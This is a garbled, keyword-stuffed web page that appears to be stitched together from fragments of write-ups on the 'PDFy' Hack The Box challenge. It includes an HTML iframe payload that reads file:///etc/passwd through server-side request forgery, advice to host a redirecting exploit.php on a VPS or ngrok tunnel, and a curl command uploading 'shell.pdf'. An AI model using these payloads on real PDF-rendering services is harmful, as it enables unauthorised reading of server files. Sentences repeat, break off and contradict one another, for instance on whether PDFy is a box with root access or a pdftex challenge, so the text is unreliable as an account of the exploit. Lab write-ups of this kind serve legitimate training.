Pdfy Htb Writeup Upd Upd [ Reliable × 2024 ]

Official PDFy Discussion - Page 2 - Challenges - Hack The Box

Pdfy is a medium-level difficulty box on Hack The Box (HTB), an online platform for cybersecurity enthusiasts to practice their skills in a legal and safe environment. The goal of this writeup is to provide a detailed walkthrough of how to exploit the Pdfy box and gain root access.

The User Proof Data flag is often not in /etc/passwd , but this confirms LFI via SSRF. pdfy htb writeup upd

Common findings:

Host a PHP file ( exploit.php ) on a public VPS or via a tunneling service. The script uses the file:// protocol to read local files, for example, using header redirection as shown on ja-errorpro.codes: Official PDFy Discussion - Page 2 - Challenges

<!DOCTYPE html> <html> <body> <h1>Leak /etc/passwd</h1> <iframe src="file:///etc/passwd" height="800px" width="100%"></iframe> </body> </html>

$ curl -X POST -F "file=@shell.pdf" 10.10.11.206:8080/upload Common findings: Host a PHP file ( exploit

However, for PDFY specifically, the working exploit often involves pdftex and \write18 .

ngrok will provide a public address, for example, tcp://0.tcp.us-cal-1.ngrok.io:19086 . However, the PDFy application expects an http:// URL. We can simply replace tcp:// with http:// in our payload. So our final attacker server address becomes http://0.tcp.us-cal-1.ngrok.io:19086 .

Once we determine that the application is blindly executing inputs, or rendering external content without sanitization, it is time to craft our payload. The Mechanism of the Exploit